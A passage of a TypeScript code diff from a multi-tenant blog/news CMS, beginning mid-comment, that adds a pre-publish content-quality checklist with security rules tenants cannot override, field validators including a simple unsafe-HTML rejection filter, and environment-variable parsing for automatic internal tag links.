+ * (`applicable: false`) unless full-online R2-only mode is genuinely active
+ * for the calling tenant (checked by the caller, `content-quality-checklist-
+ * gate.ts`, via `NewsMediaPort.isFullOnlineR2ModeActiveForTenant` — this
+ * file never touches a database or the port itself, staying pure/testable
+ * like every other `domain` file in this module). The overwhelming majority
+ * of `blog_content`-only tenants (no news-portal R2-only preset applied) see
+ * ZERO behavior change from this issue — publish/schedule works exactly as
+ * before Issue #640. This is a deliberate scope decision (not an oversight):
+ * forcing a NEW blocking editorial gate (missing meta description, missing
+ * taxonomy, etc.) onto every generic `blog_content` tenant would be exactly
+ * the "blanket tightening of a feature that's supposed to stay opt-in"
+ * mistake this epic's skill repeatedly documents avoiding (see
+ * `.claude/skills/awcms-news-portal/SKILL.md` §636 "Ketika mode TIDAK
+ * aktif ... seluruh validasi baru ini adalah no-op").
+ *
+ * Rule catalog matches Issue #640's own "Scope" list. Five rules are
+ * SECURITY blockers (`SECURITY_RULE_IDS` below) and can NEVER be downgraded
+ * by tenant policy, in any environment — Issue #640's own "Security notes":
+ * "Security blockers must not be downgraded by tenant policy in production."
+ * This implementation is intentionally STRICTER than the letter of that
+ * sentence: rather than branching on `APP_ENV` (which would mean a security
+ * rule genuinely COULD be downgraded in a non-production environment, a
+ * footgun for staging environments that mirror production data), overrides
+ * for security rule ids are rejected unconditionally, everywhere. A stricter
+ * global rule trivially satisfies a "not in production" minimum — see
+ * `applyChecklistPolicyOverrides` below.
+ *
+ * Several rules that look independently checkable are, for a media object
+ * that already reached `verified`/`attached` status, PROVABLY always true
+ * by construction (Issue #634's finalize pipeline: MIME sniffing against a
+ * fixed 4-type raster allow-list, and a hard byte cap during the capped
+ * read) — `featured_image_mime_allowed`/`featured_image_size_within_policy`
+ * below report the real recorded metadata rather than re-deriving R2
+ * verification logic Issue #634 already owns; see their comments for the
+ * precise reasoning. This checklist calls into the EXISTING verified-media
+ * primitives (`collectGalleryImageReferences`,
+ * `NewsMediaPort.resolveMediaReferences` via the application-layer gate)
+ * rather than re-deriving them, per this issue's own instruction.
+ */
+import { isAbsoluteHttpUrl } from "./seo-validation";
+import { containsUnsafeHtml } from "./content-validation";
+import { isValidSlug } from "./slug-policy";
+import type { GalleryImageReferenceViolation } from "./content-block-media-references";
+
+export type ChecklistSeverity = "blocking" | "warning" | "info";
+
+export type ChecklistRuleId =
+  | "title_present"
+  | "slug_valid"
+  | "excerpt_present"
+  | "meta_description_present"
+  | "featured_image_exists"
+  | "featured_image_verified_r2"
+  | "featured_image_alt_text"
+  | "featured_image_dimensions"
+  | "featured_image_mime_allowed"
+  | "featured_image_size_within_policy"
+  | "og_image_trusted"
+  | "no_local_image_path"
+  | "no_external_image_url"
+  | "gallery_images_verified"
+  | "taxonomy_exists"
+  | "unsafe_html_rejected"
+  | "scheduled_publish_time_valid"
+  | "social_preview_image_ready"
+  | "social_preview_image_alt_text";
+
+/**
+ * Security blockers (Issue #640 "Suggested default blocking rules" +
+ * "Security notes") — severity is ALWAYS `"blocking"`, never affected by
+ * `ChecklistPolicyOverrides`, in any environment. `featured_image_verified_r2`
+ * and `gallery_images_verified` also cover "cross-tenant media object
+ * reference" (Issue #640's fifth suggested blocker) — `NewsMediaPort`'s
+ * resolution already fails closed for a cross-tenant id, so there is no
+ * separate rule id for it.
+ */
+export const SECURITY_RULE_IDS: readonly ChecklistRuleId[] = [
+  "unsafe_html_rejected",
+  "no_local_image_path",
+  "no_external_image_url",
+  "featured_image_verified_r2",
+  "gallery_images_verified"
+];
+
+/**
+ * Rules a tenant MAY reconfigure between `warning`/`blocking`/`info` via
+ * `awcms_blog_settings.settings.contentQualityChecklistPolicy`
+ * (`blog-settings-policy.ts`) — deliberately excludes every id in
+ * `SECURITY_RULE_IDS` plus the structural ids (`title_present`/`slug_valid`/
+ * `scheduled_publish_time_valid`) that are already enforced elsewhere
+ * (write-time validation) and cannot meaningfully be "relaxed" by this
+ * checklist. `featured_image_mime_allowed`/`featured_image_size_within_policy`
+ * are also excluded — see their rule comments below for why overriding them
+ * would not change anything real.
+ */
+export const OVERRIDABLE_RULE_IDS: readonly ChecklistRuleId[] = [
+  "excerpt_present",
+  "meta_description_present",
+  "featured_image_exists",
+  "featured_image_alt_text",
+  "featured_image_dimensions",
+  "og_image_trusted",
+  "taxonomy_exists",
+  "social_preview_image_ready",
+  "social_preview_image_alt_text"
+];
+
+export type OverridableChecklistRuleId = (typeof OVERRIDABLE_RULE_IDS)[number];
+
+export type ChecklistPolicyOverrides = Partial<
+  Record<OverridableChecklistRuleId, ChecklistSeverity>
+>;
+
+export type ChecklistRuleOutcome = {
+  ruleId: ChecklistRuleId;
+  severity: ChecklistSeverity;
+  /** `false` only when `applicable` is also `true` — a non-applicable rule is always reported as passed. */
+  passed: boolean;
+  /** `false` when the rule was skipped (mode inactive for the whole checklist, or the underlying data this rule needs — e.g. a featured image — isn't present). */
+  applicable: boolean;
+  message: string;
+};
+
+export type ContentQualityChecklistResult = {
+  /** `false` only when full-online R2-only mode isn't active for the tenant — the whole checklist is then a no-op, `rules`/`blockers`/`warnings`/`info` are all empty, and `passed` is `true`. */
+  applicable: boolean;
+  /** `true` unless at least one applicable rule with severity `"blocking"` failed. */
+  passed: boolean;
+  rules: ChecklistRuleOutcome[];
+  blockers: ChecklistRuleOutcome[];
+  warnings: ChecklistRuleOutcome[];
+  info: ChecklistRuleOutcome[];
+};
+
+const NOT_APPLICABLE: ContentQualityChecklistResult = {
+  applicable: false,
+  passed: true,
+  rules: [],
+  blockers: [],
+  warnings: [],
+  info: []
+};
+
+export function notApplicableChecklistResult(): ContentQualityChecklistResult {
+  return NOT_APPLICABLE;
+}
+
+export type ResolvedFeaturedMediaForChecklist = {
+  altText: string | null;
+  width: number | null;
+  height: number | null;
+  mimeType: string;
+  sizeBytes: number | null;
+};
+
+/**
+ * Issue #649 — the winning social/SEO preview image, ALREADY resolved by
+ * the caller through the exact same priority chain the render route uses
+ * (`social-preview-image-resolution.ts`'s `resolveSocialPreviewImageSourceId`,
+ * via `content-quality-checklist-gate.ts`). This may be a DIFFERENT media
+ * object than `featuredMedia` above (an explicit SEO image override, a
+ * content-embedded image, or the tenant fallback) — only `altText` is
+ * needed here (existence alone is `social_preview_image_ready`; alt text is
+ * the separate `social_preview_image_alt_text` rule). `null` means no
+ * source in the priority chain resolved to a safe R2 object at all.
+ */
+export type ResolvedSocialPreviewImageForChecklist = {
+  altText: string | null;
+};
+
+/**
+ * Which "kind" of content this checklist runs for — `"page"` has no
+ * taxonomy assignment table at all (`awcms_blog_pages` has no
+ * `_terms` junction, unlike posts' `awcms_blog_post_terms`), so
+ * `taxonomy_exists` is never applicable for a page.
+ */
+export type ChecklistContentKind = "post" | "page";
+
+export type ContentQualityChecklistInput = {
+  contentKind: ChecklistContentKind;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  metaDescription: string | null;
+  contentText: string;
+  contentJson: Record<string, unknown>;
+  featuredMediaId: string | null;
+  /** `null` if unresolved (missing, cross-tenant, wrong status) — the caller (application layer) is the only place that can know this, via `NewsMediaPort`. */
+  featuredMedia: ResolvedFeaturedMediaForChecklist | null;
+  galleryViolations: readonly GalleryImageReferenceViolation[];
+  /** Well-formed `mediaObjectId`s referenced by gallery image items that did NOT resolve safely (missing/cross-tenant/wrong status) — the ones that DID resolve need no rule (they already passed). */
+  unsafeGalleryMediaObjectIds: readonly string[];
+  termCount: number;
+  /** Present (non-null) only when evaluated for the "schedule" action; `null` for an immediate publish or the scheduled-publish job's own re-check. */
+  scheduledAt: Date | null;
+  now: Date;
+  /** Issue #649 — see `ResolvedSocialPreviewImageForChecklist`'s comment. `null` when no source in the priority chain resolved. */
+  socialPreviewImage: ResolvedSocialPreviewImageForChecklist | null;
+};
+
+function classifyRawImageUrl(url: string): "local_path" | "external_url" {
+  return isAbsoluteHttpUrl(url) ? "external_url" : "local_path";
+}
+
+function outcome(
+  ruleId: ChecklistRuleId,
+  severity: ChecklistSeverity,
+  passed: boolean,
+  applicable: boolean,
+  message: string
+): ChecklistRuleOutcome {
+  return { ruleId, severity, passed, applicable, message };
+}
+
+/**
+ * Applies `overrides` on top of `defaultSeverity`, refusing to touch any id
+ * outside `OVERRIDABLE_RULE_IDS` — defense in depth on top of
+ * `blog-settings-policy.ts` already rejecting an unknown/security key at
+ * write time (this function would still fail closed even if that write-time
+ * guard were ever removed or bypassed by a future direct DB write, same
+ * "don't trust a single enforcement point" lesson as Issue #636's restore-
+ * revision bypass).
+ */
+function resolveSeverity(
+  ruleId: ChecklistRuleId,
+  defaultSeverity: ChecklistSeverity,
+  overrides: ChecklistPolicyOverrides
+): ChecklistSeverity {
+  if (!(OVERRIDABLE_RULE_IDS as readonly string[]).includes(ruleId)) {
+    return defaultSeverity;
+  }
+
+  const override = overrides[ruleId as OverridableChecklistRuleId];
+  return override ?? defaultSeverity;
+}
+
+export function evaluateContentQualityChecklist(
+  input: ContentQualityChecklistInput,
+  overrides: ChecklistPolicyOverrides = {}
+): ContentQualityChecklistResult {
+  const sev = (ruleId: ChecklistRuleId, defaultSeverity: ChecklistSeverity) =>
+    resolveSeverity(ruleId, defaultSeverity, overrides);
+
+  const rules: ChecklistRuleOutcome[] = [];
+
+  // --- Structural rules (already enforced at write time; re-checked here for defense-in-depth completeness, never overridable) ---
+  rules.push(
+    outcome(
+      "title_present",
+      "blocking",
+      input.title.trim().length > 0,
+      true,
+      input.title.trim().length > 0
+        ? "Title is present."
+        : "Title is required before publishing."
+    )
+  );
+
+  rules.push(
+    outcome(
+      "slug_valid",
+      "blocking",
+      isValidSlug(input.slug),
+      true,
+      isValidSlug(input.slug)
+        ? "Slug is valid."
+        : "Slug must be lowercase alphanumeric segments separated by single hyphens."
+    )
+  );
+
+  const unsafe =
+    containsUnsafeHtml(input.contentText) ||
+    containsUnsafeHtml(JSON.stringify(input.contentJson));
+  rules.push(
+    outcome(
+      "unsafe_html_rejected",
+      "blocking",
+      !unsafe,
+      true,
+      unsafe
+        ? "Content contains unsafe HTML/script/embed markup and must be removed before publishing."
+        : "No unsafe HTML/script/embed markup detected."
+    )
+  );
+
+  // --- Editorial/SEO rules (overridable, default warning) ---
+  const hasExcerpt = (input.excerpt ?? "").trim().length > 0;
+  rules.push(
+    outcome(
+      "excerpt_present",
+      sev("excerpt_present", "warning"),
+      hasExcerpt,
+      true,
+      hasExcerpt
+        ? "Excerpt is present."
+        : "Excerpt is missing — recommended for listings and social previews."
+    )
+  );
+
+  const hasMetaDescription = (input.metaDescription ?? "").trim().length > 0;
+  rules.push(
+    outcome(
+      "meta_description_present",
+      sev("meta_description_present", "warning"),
+      hasMetaDescription,
+      true,
+      hasMetaDescription
+        ? "Meta description is present."
+        : "Meta description is missing — recommended for SEO."
+    )
+  );
+
+  if (input.contentKind === "post") {
+    const hasTaxonomy = input.termCount > 0;
+    rules.push(
+      outcome(
+        "taxonomy_exists",
+        sev("taxonomy_exists", "warning"),
+        hasTaxonomy,
+        true,
+        hasTaxonomy
+          ? "At least one category/tag is assigned."
+          : "No category/tag assigned — recommended for discoverability."
+      )
+    );
+  } else {
+    rules.push(
+      outcome(
+        "taxonomy_exists",
+        sev("taxonomy_exists", "warning"),
+        true,
+        false,
+        "Not applicable — pages have no category/tag taxonomy."
+      )
+    );
+  }
+
+  // --- Scheduled publish time ---
+  if (input.scheduledAt) {
+    const valid = input.scheduledAt.getTime() > input.now.getTime();
+    rules.push(
+      outcome(
+        "scheduled_publish_time_valid",
+        "blocking",
+        valid,
+        true,
+        valid
+          ? "Scheduled publish time is in the future."
+          : "Scheduled publish time must be in the future."
+      )
+    );
+  } else {
+    rules.push(
+      outcome(
+        "scheduled_publish_time_valid",
+        "blocking",
+        true,
+        false,
+        "Not applicable — this is not a scheduling request."
+      )
+    );
+  }
+
+  // --- Featured image ---
+  const hasFeaturedMediaId = input.featuredMediaId !== null;
+  rules.push(
+    outcome(
+      "featured_image_exists",
+      sev("featured_image_exists", "warning"),
+      hasFeaturedMediaId,
+      true,
+      hasFeaturedMediaId
+        ? "Featured image is set."
+        : "No featured image is set."
+    )
+  );
+
+  if (hasFeaturedMediaId) {
+    const verified = input.featuredMedia !== null;
+    rules.push(
+      outcome(
+        "featured_image_verified_r2",
+        "blocking",
+        verified,
+        true,
+        verified
+          ? "Featured image references a verified R2 media object."
+          : "Featured image does not reference an existing, same-tenant, verified R2 media object."
+      )
+    );
+
+    if (verified) {
+      const media = input.featuredMedia!;
+      const hasAlt = (media.altText ?? "").trim().length > 0;
+      rules.push(
+        outcome(
+          "featured_image_alt_text",
+          sev("featured_image_alt_text", "warning"),
+          hasAlt,
+          true,
+          hasAlt
+            ? "Featured image has alt text."
+            : "Featured image is missing alt text — recommended for accessibility/SEO."
+        )
+      );
+
+      const hasDimensions = media.width !== null && media.height !== null;
+      rules.push(
+        outcome(
+          "featured_image_dimensions",
+          sev("featured_image_dimensions", "warning"),
+          hasDimensions,
+          true,
+          hasDimensions
+            ? `Featured image dimensions recorded (${media.width}x${media.height}).`
+            : "Featured image width/height metadata is missing."
+        )
+      );
+
+      // Not independently overridable: any object that reached
+      // verified/attached status necessarily already passed MIME
+      // sniffing against Issue #634's fixed raster allow-list at upload
+      // time — this rule reports the recorded value rather than
+      // re-deriving that verification.
+      rules.push(
+        outcome(
+          "featured_image_mime_allowed",
+          "info",
+          true,
+          true,
+          `Featured image MIME type "${media.mimeType}" was verified at upload time.`
+        )
+      );
+
+      const hasSize = media.sizeBytes !== null && media.sizeBytes > 0;
+      rules.push(
+        outcome(
+          "featured_image_size_within_policy",
+          "info",
+          hasSize,
+          true,
+          hasSize
+            ? `Featured image size recorded (${media.sizeBytes} bytes).`
+            : "Featured image size metadata is missing."
+        )
+      );
+
+      rules.push(
+        outcome(
+          "og_image_trusted",
+          sev("og_image_trusted", "warning"),
+          true,
+          true,
+          "og:image/twitter:image will use this verified R2 media object."
+        )
+      );
+    } else {
+      for (const ruleId of [
+        "featured_image_alt_text",
+        "featured_image_dimensions",
+        "featured_image_mime_allowed",
+        "featured_image_size_within_policy"
+      ] as const) {
+        rules.push(
+          outcome(
+            ruleId,
+            ruleId === "featured_image_mime_allowed" ||
+              ruleId === "featured_image_size_within_policy"
+              ? "info"
+              : sev(ruleId, "warning"),
+            true,
+            false,
+            "Not applicable — featured image failed R2 verification."
+          )
+        );
+      }
+
+      rules.push(
+        outcome(
+          "og_image_trusted",
+          sev("og_image_trusted", "warning"),
+          false,
+          true,
+          "og:image/twitter:image cannot use an unverified featured image."
+        )
+      );
+    }
+  } else {
+    for (const ruleId of [
+      "featured_image_verified_r2",
+      "featured_image_alt_text",
+      "featured_image_dimensions",
+      "featured_image_mime_allowed",
+      "featured_image_size_within_policy",
+      "og_image_trusted"
+    ] as const) {
+      rules.push(
+        outcome(
+          ruleId,
+          ruleId === "featured_image_verified_r2"
+            ? "blocking"
+            : ruleId === "featured_image_mime_allowed" ||
+                ruleId === "featured_image_size_within_policy"
+              ? "info"
+              : sev(ruleId, "warning"),
+          true,
+          false,
+          "Not applicable — no featured image is set."
+        )
+      );
+    }
+  }
+
+  // --- Gallery images: local path / external URL / unverified reference ---
+  const localPathViolations = input.galleryViolations.filter(
+    (violation) =>
+      violation.reason === "raw_url_not_allowed" &&
+      violation.rawUrl !== undefined &&
+      classifyRawImageUrl(violation.rawUrl) === "local_path"
+  );
+  const externalUrlViolations = input.galleryViolations.filter(
+    (violation) =>
+      violation.reason === "raw_url_not_allowed" &&
+      violation.rawUrl !== undefined &&
+      classifyRawImageUrl(violation.rawUrl) === "external_url"
+  );
+  const malformedReferenceCount = input.galleryViolations.filter(
+    (violation) => violation.reason === "media_object_id_missing_or_malformed"
+  ).length;
+
+  rules.push(
+    outcome(
+      "no_local_image_path",
+      "blocking",
+      localPathViolations.length === 0,
+      true,
+      localPathViolations.length === 0
+        ? "No local image path found in content."
+        : `${localPathViolations.length} gallery image item(s) use a local image path — not allowed in full-online R2-only mode.`
+    )
+  );
+
+  rules.push(
+    outcome(
+      "no_external_image_url",
+      "blocking",
+      externalUrlViolations.length === 0,
+      true,
+      externalUrlViolations.length === 0
+        ? "No arbitrary external image URL found in news image blocks."
+        : `${externalUrlViolations.length} gallery image item(s) use an arbitrary external URL — not allowed in full-online R2-only mode.`
+    )
+  );
+
+  const galleryVerifiedFailures =
+    malformedReferenceCount + input.unsafeGalleryMediaObjectIds.length;
+  rules.push(
+    outcome(
+      "gallery_images_verified",
+      "blocking",
+      galleryVerifiedFailures === 0,
+      true,
+      galleryVerifiedFailures === 0
+        ? "All gallery images reference verified R2 media objects."
+        : `${galleryVerifiedFailures} gallery image item(s) do not reference an existing, same-tenant, verified R2 media object.`
+    )
+  );
+
+  // --- Social preview readiness (Issue #649) ---
+  const hasSocialPreviewImage = input.socialPreviewImage !== null;
+  rules.push(
+    outcome(
+      "social_preview_image_ready",
+      sev("social_preview_image_ready", "warning"),
+      hasSocialPreviewImage,
+      true,
+      hasSocialPreviewImage
+        ? "A verified R2 image is available for social/SEO preview sharing."
+        : "No verified R2 image is available for social/SEO preview sharing (explicit SEO image, featured image, content image, and tenant fallback all unresolved)."
+    )
+  );
+
+  if (hasSocialPreviewImage) {
+    const hasSocialPreviewAlt =
+      (input.socialPreviewImage!.altText ?? "").trim().length > 0;
+    rules.push(
+      outcome(
+        "social_preview_image_alt_text",
+        sev("social_preview_image_alt_text", "warning"),
+        hasSocialPreviewAlt,
+        true,
+        hasSocialPreviewAlt
+          ? "Social/SEO preview image has alt text."
+          : "Social/SEO preview image is missing alt text — recommended for accessibility/SEO."
+      )
+    );
+  } else {
+    rules.push(
+      outcome(
+        "social_preview_image_alt_text",
+        sev("social_preview_image_alt_text", "warning"),
+        true,
+        false,
+        "Not applicable — no social/SEO preview image is available."
+      )
+    );
+  }
+
+  const blockers = rules.filter(
+    (rule) => rule.applicable && rule.severity === "blocking" && !rule.passed
+  );
+  const warnings = rules.filter(
+    (rule) => rule.applicable && rule.severity === "warning" && !rule.passed
+  );
+  const info = rules.filter(
+    (rule) => rule.applicable && rule.severity === "info" && !rule.passed
+  );
+
+  return {
+    applicable: true,
+    passed: blockers.length === 0,
+    rules,
+    blockers,
+    warnings,
+    info
+  };
+}
+
+/**
+ * Validates a tenant-supplied policy override map (used by
+ * `blog-settings-policy.ts`) — every key must be in `OVERRIDABLE_RULE_IDS`
+ * (rejects a security rule id or an unknown rule id outright, rather than
+ * silently ignoring it, so a typo/attempted-bypass surfaces as a `400` at
+ * write time instead of silently doing nothing) and every value must be a
+ * real `ChecklistSeverity`.
+ */
+export function isValidChecklistSeverity(
+  value: unknown
+): value is ChecklistSeverity {
+  return value === "blocking" || value === "warning" || value === "info";
+}
+
+export function isOverridableChecklistRuleId(
+  value: string
+): value is OverridableChecklistRuleId {
+  return (OVERRIDABLE_RULE_IDS as readonly string[]).includes(value);
+}

--- a/src/modules/blog-content/domain/content-validation.ts
+++ b/src/modules/blog-content/domain/content-validation.ts
@@ -1,0 +1,212 @@
+import { isValidSlug } from "./slug-policy";
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+/**
+ * Core fields shared by posts and pages (doc issue #537 §Core Data Rules).
+ * Lifecycle fields (`status`, `visibility`), SEO fields, and page-only
+ * fields (`pageType`, `parentPageId`, `menuOrder`) are validated separately
+ * (`post-status.ts`, `seo-validation.ts`) so each concern stays independently
+ * testable — Issue #538/#539's create/update handlers compose all of them.
+ */
+export type BlogContentCoreInput = {
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  contentJson: Record<string, unknown>;
+  contentText: string;
+  locale: string;
+};
+
+export type BlogContentCoreValidationResult =
+  | { valid: true; value: BlogContentCoreInput }
+  | { valid: false; errors: ValidationError[] };
+
+const MAX_TITLE_LENGTH = 200;
+const MAX_EXCERPT_LENGTH = 500;
+
+/** Same list `email-template-validation.ts` uses for admin-authored HTML template shells (doc 20 §XSS) — applied here to `contentJson`/`contentText` (Issue #538 acceptance criterion: "Unsafe HTML/script/embed content is rejected or sanitized"). Rejects rather than sanitizes, same choice email templates made. */
+const UNSAFE_HTML_PATTERNS: readonly RegExp[] = [
+  /<script\b/i,
+  /<iframe\b/i,
+  /<embed\b/i,
+  /<object\b/i,
+  /\bon\w+\s*=/i,
+  /javascript:/i
+];
+
+/** Exported for reuse by other free-text fields in this module (Issue #542's widget `bodyText`) that need the same reject-don't-sanitize check, without duplicating the pattern list. */
+export function containsUnsafeHtml(value: string): boolean {
+  return UNSAFE_HTML_PATTERNS.some((pattern) => pattern.test(value));
+}
+
+function isNonEmptyString(value: unknown): value is string {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+/**
+ * Field-level validators, each independently usable so a partial-update
+ * validator (Issue #538's `PATCH /api/v1/blog/posts/{id}`) can check only
+ * the fields actually present in the request body, without needing to
+ * fabricate placeholder values for the fields it composes from
+ * `validateBlogContentCore`.
+ */
+export function validateTitleField(value: unknown): ValidationError | null {
+  if (!isNonEmptyString(value)) {
+    return { field: "title", message: "title is required." };
+  }
+
+  if (value.length > MAX_TITLE_LENGTH) {
+    return {
+      field: "title",
+      message: `title must be at most ${MAX_TITLE_LENGTH} characters.`
+    };
+  }
+
+  return null;
+}
+
+export function validateSlugField(value: unknown): ValidationError | null {
+  if (!isNonEmptyString(value)) {
+    return { field: "slug", message: "slug is required." };
+  }
+
+  if (!isValidSlug(value)) {
+    return {
+      field: "slug",
+      message:
+        "slug must be lowercase alphanumeric segments separated by single hyphens."
+    };
+  }
+
+  return null;
+}
+
+export function validateExcerptField(value: unknown): ValidationError | null {
+  if (
+    value !== undefined &&
+    value !== null &&
+    (typeof value !== "string" || value.length > MAX_EXCERPT_LENGTH)
+  ) {
+    return {
+      field: "excerpt",
+      message: `excerpt must be a string of at most ${MAX_EXCERPT_LENGTH} characters.`
+    };
+  }
+
+  return null;
+}
+
+export function validateContentJsonField(
+  value: unknown
+): ValidationError | null {
+  if (typeof value !== "object" || value === null || Array.isArray(value)) {
+    return {
+      field: "contentJson",
+      message: "contentJson is required and must be an object."
+    };
+  }
+
+  if (containsUnsafeHtml(JSON.stringify(value))) {
+    return {
+      field: "contentJson",
+      message:
+        "contentJson must not contain <script>, <iframe>, <embed>, <object>, inline event handler attributes, or javascript: URLs."
+    };
+  }
+
+  return null;
+}
+
+export function validateContentTextField(
+  value: unknown
+): ValidationError | null {
+  if (!isNonEmptyString(value)) {
+    return { field: "contentText", message: "contentText is required." };
+  }
+
+  if (containsUnsafeHtml(value)) {
+    return {
+      field: "contentText",
+      message:
+        "contentText must not contain <script>, <iframe>, <embed>, <object>, inline event handler attributes, or javascript: URLs."
+    };
+  }
+
+  return null;
+}
+
+export function validateLocaleField(value: unknown): ValidationError | null {
+  if (value !== undefined && !isNonEmptyString(value)) {
+    return {
+      field: "locale",
+      message: "locale must be a non-empty string when provided."
+    };
+  }
+
+  return null;
+}
+
+export type DeleteReasonInput = {
+  reason: string;
+};
+
+export type DeleteReasonValidationResult =
+  | { valid: true; value: DeleteReasonInput }
+  | { valid: false; errors: ValidationError[] };
+
+/**
+ * Shared soft-delete `{ reason: string }` body validator (Issue #538's
+ * `DELETE /api/v1/blog/posts/{id}` established this shape; Issue #539
+ * reuses it verbatim for pages and terms rather than re-deriving it).
+ */
+export function validateDeleteReasonInput(
+  body: unknown
+): DeleteReasonValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+
+  if (!isNonEmptyString(record.reason)) {
+    return {
+      valid: false,
+      errors: [{ field: "reason", message: "reason is required." }]
+    };
+  }
+
+  return { valid: true, value: { reason: record.reason.trim() } };
+}
+
+export function validateBlogContentCore(
+  body: unknown
+): BlogContentCoreValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors = [
+    validateTitleField(record.title),
+    validateSlugField(record.slug),
+    validateExcerptField(record.excerpt),
+    validateContentJsonField(record.contentJson),
+    validateContentTextField(record.contentText),
+    validateLocaleField(record.locale)
+  ].filter((error): error is ValidationError => error !== null);
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      title: (record.title as string).trim(),
+      slug: (record.slug as string).trim(),
+      excerpt:
+        record.excerpt === undefined || record.excerpt === null
+          ? null
+          : (record.excerpt as string).trim(),
+      contentJson: record.contentJson as Record<string, unknown>,
+      contentText: record.contentText as string,
+      locale: isNonEmptyString(record.locale) ? record.locale.trim() : "id"
+    }
+  };
+}

--- a/src/modules/blog-content/domain/internal-tag-linking-config.ts
+++ b/src/modules/blog-content/domain/internal-tag-linking-config.ts
@@ -1,0 +1,145 @@
+/**
+ * `BLOG_AUTO_INTERNAL_TAG_LINKS_*` configuration (Issue #641, epic
+ * `news_portal` — the feature itself lives in `blog_content`, see
+ * `.claude/skills/awcms-news-portal/SKILL.md` §641). Pure — no
+ * `process.env` reads here; callers (`scripts/validate-env.ts`,
+ * `internal-tag-link-rendering.ts`) pass in whatever `env` they were
+ * given. Same split as `news-media-r2-config.ts`/`visitor-analytics/domain/
+ * visitor-analytics-config.ts`.
+ *
+ * These six variables are DEPLOYMENT-WIDE defaults/limits, resolved once
+ * per process — they are NOT per-tenant overridable (unlike `enabled`/
+ * `caseInsensitive`/`disabledTagIds`, which live in the dedicated
+ * `awcms_blog_internal_tag_link_settings` table, one row per tenant,
+ * see `internal-tag-link-settings-directory.ts`). `BLOG_AUTO_INTERNAL_TAG_
+ * LINKS_ENABLED` is a hard deployment-level kill switch: when `false`, no
+ * tenant can turn the feature on regardless of its own per-tenant
+ * `enabled` override (same "env is a ceiling, tenant can only narrow it"
+ * pattern `news_portal`'s `NEWS_PORTAL_ENABLED` establishes) — see
+ * `resolveEffectiveInternalTagLinkingPolicy` in `internal-tag-link-
+ * rendering.ts` for where the two are combined.
+ */
+
+export type BlogAutoInternalTagLinksConfig = {
+  enabled: boolean;
+  maxPerPost: number;
+  maxPerTag: number;
+  minTermLength: number;
+  linkFirstOccurrenceOnly: boolean;
+  excludeHeadings: boolean;
+};
+
+export const BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS: BlogAutoInternalTagLinksConfig =
+  {
+    enabled: true,
+    maxPerPost: 10,
+    maxPerTag: 1,
+    minTermLength: 3,
+    linkFirstOccurrenceOnly: true,
+    excludeHeadings: true
+  };
+
+/** Upper bound for `BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_POST` — a much higher value would risk turning normal editorial prose into a link farm and would meaningfully slow down rendering of very long articles. */
+export const BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_POST_CEILING = 100;
+
+/** Upper bound for `BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_TAG` — linking the same tag more than a handful of times in one post has no real editorial value and looks like keyword stuffing. */
+export const BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_TAG_CEILING = 20;
+
+/** Upper bound for `BLOG_AUTO_INTERNAL_TAG_LINKS_MIN_TERM_LENGTH` — a floor this high would make the feature a no-op for most real tag catalogs. */
+export const BLOG_AUTO_INTERNAL_TAG_LINKS_MIN_TERM_LENGTH_CEILING = 100;
+
+function isSet(value: string | undefined): boolean {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+function parseBoolean(value: string | undefined, fallback: boolean): boolean {
+  if (!isSet(value)) return fallback;
+  return value === "true";
+}
+
+/** `undefined` when unset/blank/non-positive-integer — never throws, never `NaN` (same contract as `news-media-r2-config.ts`'s `parsePositiveInt`). */
+export function parsePositiveInt(
+  value: string | undefined
+): number | undefined {
+  if (!isSet(value)) return undefined;
+
+  const trimmed = (value as string).trim();
+
+  if (!/^\d+$/.test(trimmed)) return undefined;
+
+  const parsed = Number.parseInt(trimmed, 10);
+
+  return parsed > 0 ? parsed : undefined;
+}
+
+/**
+ * Resolves the full config from `env`, falling back to
+ * `BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS` for anything unset/malformed.
+ * Never throws — out-of-range values are reported by
+ * `findBlogAutoInternalTagLinksConfigIssues` (`scripts/validate-env.ts`),
+ * not clamped/rejected here (same "resolve leniently, validate separately"
+ * split every other config resolver in this repo follows).
+ */
+export function resolveBlogAutoInternalTagLinksConfig(
+  env: NodeJS.ProcessEnv = process.env
+): BlogAutoInternalTagLinksConfig {
+  return {
+    enabled: parseBoolean(
+      env.BLOG_AUTO_INTERNAL_TAG_LINKS_ENABLED,
+      BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS.enabled
+    ),
+    maxPerPost:
+      parsePositiveInt(env.BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_POST) ??
+      BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS.maxPerPost,
+    maxPerTag:
+      parsePositiveInt(env.BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_TAG) ??
+      BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS.maxPerTag,
+    minTermLength:
+      parsePositiveInt(env.BLOG_AUTO_INTERNAL_TAG_LINKS_MIN_TERM_LENGTH) ??
+      BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS.minTermLength,
+    linkFirstOccurrenceOnly: parseBoolean(
+      env.BLOG_AUTO_INTERNAL_TAG_LINKS_LINK_FIRST_OCCURRENCE_ONLY,
+      BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS.linkFirstOccurrenceOnly
+    ),
+    excludeHeadings: parseBoolean(
+      env.BLOG_AUTO_INTERNAL_TAG_LINKS_EXCLUDE_HEADINGS,
+      BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS.excludeHeadings
+    )
+  };
+}
+
+export type BlogAutoInternalTagLinksConfigIssue =
+  | "max_per_post_out_of_range"
+  | "max_per_tag_out_of_range"
+  | "min_term_length_out_of_range";
+
